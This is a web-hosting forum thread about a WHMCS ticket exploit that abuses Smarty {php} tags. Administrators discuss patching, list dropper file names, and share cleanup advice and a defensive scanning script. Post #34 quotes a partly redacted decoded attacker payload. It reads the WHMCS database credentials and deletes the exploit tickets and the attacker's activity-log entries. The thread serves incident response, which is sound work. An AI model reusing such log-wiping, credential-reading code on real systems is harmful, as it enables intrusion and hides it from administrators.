  1. #31
    Join Date: Feb 2003 | Location: Cumbernauld, Scotland, UK | Posts: 732
    Quote Originally Posted by cpoalmighty:
    Isn't dl a standard WHMCS file?
    What do we have to look for specifically?
    Yes, dl.php is a WHMCS system file
    Look at the date of the files on FTP
    If they have the same date as the support ticket then you know it has been compromised

    As I posted some time ago, the exploit assumes eval is ON
    My solution was to turn eval OFF
    Obviously if you need to use eval in php then you need to apply the patch

    Equally, only my customers can submit support tickets
    As a result this attacker had to register as a new customer first
    Clearly it is a person rather than a bot as they took the time to make sure they put the correct city (to match the IP address from Saudi Arabia) and even answered some of the questions!

  2. #32
    Join Date: Mar 2009 | Posts: 2,310
    Quote Originally Posted by bear:
    The solution appears to be to apply the patch and possibly block subjects that begin with that tag. If you have a mod_sec rule that defeats this, that should be no problem.
    Hi, I use WHM/cPanel and installed WHMCS on it. Can I ask how you use a mod_sec rule to secure it more? Thanks

  3. #33
    Join Date: Apr 2009 | Location: OnTheWeb | Posts: 2,017
    Quote Originally Posted by m8internet:
    Yes, dl.php is a WHMCS system file
    Look at the date of the files on FTP
    If they have the same date as the support ticket then you know it has been compromised

    As I posted some time ago, the exploit assumes eval is ON
    My solution was to turn eval OFF
    Obviously if you need to use eval in php then you need to apply the patch

    Equally, only my customers can submit support tickets
    As a result this attacker had to register as a new customer first
    Clearly it is a person rather than a bot as they took the time to make sure they put the correct city (to match the IP address from Saudi Arabia) and even answered some of the questions!
    Good detective work

    I'm safe because I just double checked it (that means that the patch is working)

    <<<snipped my content >>>

  4. #34
    This is really a great security issue. Has WHMCS rolled out any patch for it?

    Quote Originally Posted by DewlanceHosting:
    I decoded his code with a base64 decoder..
    Code:
    $text=file_get_contents("configuration.php");
    REMOVED.....
    eval($text);   // loads the WHMCS config so $db_host, $db_username, ... are in scope

    $db=mysql_connect($db_host,$db_username,$db_password) or die("Can't open connection to MySQL");
    mysql_select_db($db_name) or die("Can't select database");
    // 0x257B7068707D25 is the hex form of '%{php}%': deletes the ticket(s) that carried the payload
    $delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
    mysql_query($delete);
    // deletes the activity-log rows recorded for the attacker's own IP address
    $delete2 ="DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
    REMOVED!!!!! so others will not use this...

  5. #35
    Join Date: Nov 2004 | Location: Australia | Posts: 1,576
    Quote Originally Posted by msam029:
    This is really a great security issue is WHMCS rolled out any patch for it
    Weeks ago, don't tell me you haven't been paying attention to any of the MANY notices about it - on here, in WHMCS itself, on their site, in their forums ...

  6. #36
    Join Date: Feb 2007 | Location: Federal Heights, CO | Posts: 1,846
    Just wanted to add some more info to this thread. Initial exploit attempts against us were trying to place a file called b0x.php in the following directories:
    Code:
    templates_c
    images
    A quick way to search for the known exploit files:
    Code:
    find / | grep b0x.php
    find / | grep dl.php
    find / | grep wh.php
    find / | grep xfr.php
    find / | grep sss.php
    find / | grep ed8.php
    find / | grep test.php
    find / | grep red.php
    Just a heads up.
    -Joe @ Secure Dragon LLC.

  7. #37
    Join Date: May 2009 | Location: United Kingdom | Posts: 1,312
    Thanks for the heads up Joe!

  8. #38
    The attackers keep trying to exploit our WHMCS, a couple of tickets a week. Unfortunately for them it was patched from day one of the exploit. I have had to disable them and allow them for clients only.

    - Ashton

  9. #39
    Join Date: Aug 2009 | Location: LAX, DAL, MIA | Posts: 3,308
    We get about 5 of these tickets a day. Patched it the day the email was received from WHMCS about it. It's most likely going to be an on-going issue (Receiving the emails meaning) for a couple of months until they realize all of the legitimate WHMCS setups have been patched.

  10. #40
    Join Date: Dec 2004 | Posts: 461
    Quote Originally Posted by almanox:
    Disabling php tag has been one of the security features of smarty templates for years. Weird it created issues just now. I used to believe it was disabled in such serious projects as billing systems but seems like it was not at least in email/ticket parsing code.
    I do not think the vulnerability is in the ticket code itself, but elsewhere.

    A patch has been released recently, for an issue that allows any local file on the webserver to be displayed/interpreted as template file.

    So I assume the ticket facility is merely used as a way to get a file uploaded, that is later executed by using the vulnerability.

    Be aware that there may be other ways for an attacker to get a file uploaded on your system (e.g. through another website hosted on the same webserver).
    So people should not assume they are secure because they disabled their ticket system, or set it to "customers only"
    Make sure you applied the patch instead.


    BTW it seems WHMCS uses {php} in their own templates as well:

    Code:
    $ grep -R "{php}" *
    orderforms/boxes/products.tpl:{php}
    orderforms/boxes/configureproductdomain.tpl:www. <input type="text" name="sld[2]" size="40" value="{$sld}" /> . <input type="text" name="tld[2]" size="7" value="{php}
    So disabling code execution in smarty might break legitimate functionality.

  11. #41
    Join Date: Oct 2009 | Location: Chicago, Illinois | Posts: 60
    Alright, this is what's up.

    Most of you have been getting these, and don't know what is happening.

    First of all, run through all of your logs, check IPs of admins logged, and actions executed.

    This exploit was around before the patch was even up, so most people have been compromised before they even patched it.

    Patching this, doesn't mean you are now safe and secure. What I have been seeing mostly is that the hackers have exploited and injected a backdoor page. This page can be ANYWHERE on your website. It is a page that decrypts your admin password, and pretty much anything in your system.

    The solutions:
    EASIEST: Backup your database, and DELETE EVERYTHING from your public_html to make sure you delete the backdoor file that was injected. Then download the newest most stable release of WHMCS, and attach it to your DB. Make sure to change ALL PASSWORDS. That includes admin, sql passwords, sql username passwords, etc. Also change your database name and username that connects to the database. This will make sure that the backdoors have been deleted and you are now up-to-date with new passwords, and all the patched files. Lastly, if you have regular index.php files on your web server that are not attached to WHMCS, look through those files carefully for any of the possible injected code.


    The second option is just much more painful. This would include looking through every single file in your system and every single folder to find any compromised files.

    Hope this helps.
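An added example, not code from the thread or from WHMCS: the file hunt from post #36 and the "find the injected backdoor" step from post #41 combined into one POSIX shell script. It checks a document root for the known dropper names, for PHP files modified after a reference file (set its mtime to the exploit ticket's date, as post #31 suggests), and for an eval(base64_decode( construct; that last pattern is an assumption about how the payload is packed, based on post #34 having base64-decoded a dropper that ends in eval(). make_sample_root and the dates it uses are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the thread. Usage on a real install:
#   touch -t 201112010000 /tmp/ticket_date   # mtime = the exploit ticket's date (post #31)
#   scan_webroot /home/user/public_html /tmp/ticket_date

# Dropper/backdoor file names listed in post #36.
KNOWN_NAMES="b0x.php dl.php wh.php xfr.php sss.php ed8.php test.php red.php"

# scan_webroot ROOT SINCE_FILE -> one line per finding: "<kind> <path>"
#   name    : file name is one of the known droppers
#   newer   : PHP file modified after SINCE_FILE (same day as the ticket is suspicious)
#   pattern : file contains eval(base64_decode( ; assumed packing of the payload,
#             inferred from post #34's base64-decoded dropper that ends in eval()
scan_webroot() {
    root=$1; since=$2
    for n in $KNOWN_NAMES; do
        find "$root" -type f -name "$n" -print | sed 's/^/name /'
    done
    find "$root" -type f -name '*.php' -newer "$since" -print | sed 's/^/newer /'
    grep -rlE --include='*.php' 'eval\(base64_decode\(' "$root" 2>/dev/null | sed 's/^/pattern /'
}

# make_sample_root builds a constructed tree so the script runs offline:
# one clean include from November and one dropper planted on the ticket's date.
make_sample_root() {
    root=$(mktemp -d)
    mkdir -p "$root/templates_c" "$root/images" "$root/includes"
    printf '<?php echo "clean"; ?>\n' > "$root/includes/clean.php"
    touch -t 201111010000 "$root/includes/clean.php"
    : > "$root/.ticket_date"
    touch -t 201112010000 "$root/.ticket_date"          # constructed ticket date: 1 Dec 2011
    # constructed payload: base64 of 'echo 1;', harmless
    printf '<?php eval(base64_decode("ZWNobyAxOw=="));\n' > "$root/templates_c/b0x.php"
    touch -t 201112010500 "$root/templates_c/b0x.php"   # dropped a few hours after the ticket
    echo "$root"
}

# Run with --demo to scan the constructed tree and print the three findings for b0x.php.
if [ "${1:-}" = "--demo" ]; then
    demo=$(make_sample_root)
    scan_webroot "$demo" "$demo/.ticket_date"
    rm -rf "$demo"
fi
```

A hit on "newer" alone is not proof of compromise (legitimate updates also touch files), so compare the listed paths against a fresh WHMCS download before deleting anything.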

  12. #42
    Join Date: Oct 2002 | Location: Middle Dearth | Posts: 20,887
    Quote Originally Posted by Maxnet:
    A patch has been released recently, for an issue that allows any local file on the webserver to be displayed/interpreted as template file.
    That exploit was patched a while back, this eval exploit is much newer and patched on Dec 1.
    Quote Originally Posted by djeuro:
    This exploit was around before the patch was even up, so most people have been compromised before they even patched it.
    Hard to patch before the exploit was found.


  13. #43
    Join Date: Oct 2009 | Location: Chicago, Illinois | Posts: 60
    Quote Originally Posted by bear:
    That exploit was patched a while back, this eval exploit is much newer and patched on Dec 1.

    Hard to patch before the exploit was found.
    Well yes it's hard to patch it before exploit is found, that's why I just explained the steps to take now instead of saying people should have found it before the actual patch.

  14. #44
    Join Date: Nov 2004 | Location: Australia | Posts: 1,576
    Quote Originally Posted by djeuro:
    This exploit was around before the patch was even up, so most people have been compromised before they even patched it.
    Thanks for your post.

    Actually it would be extremely helpful if you could be more explicit about what signs of hacking to look for. It should be possible to use "grep -r" to find exploits if we know what to look for, for example, iframes etc.

  15. #45
    Join Date: Oct 2009 | Location: Chicago, Illinois | Posts: 60
    Quote Originally Posted by brianoz:
    Thanks for your post.

    Actually it would be extremely helpful if you could be more explicit about what signs of hacking to look for. It should be possible to use "grep -r" to find exploits if we know what to look for, for example, iframes etc.
    I am actually more than willing to share the whole script with you guys since one of my sites was injected with this. The more we can see about it, the more we can patch.

    Contact me over PM.
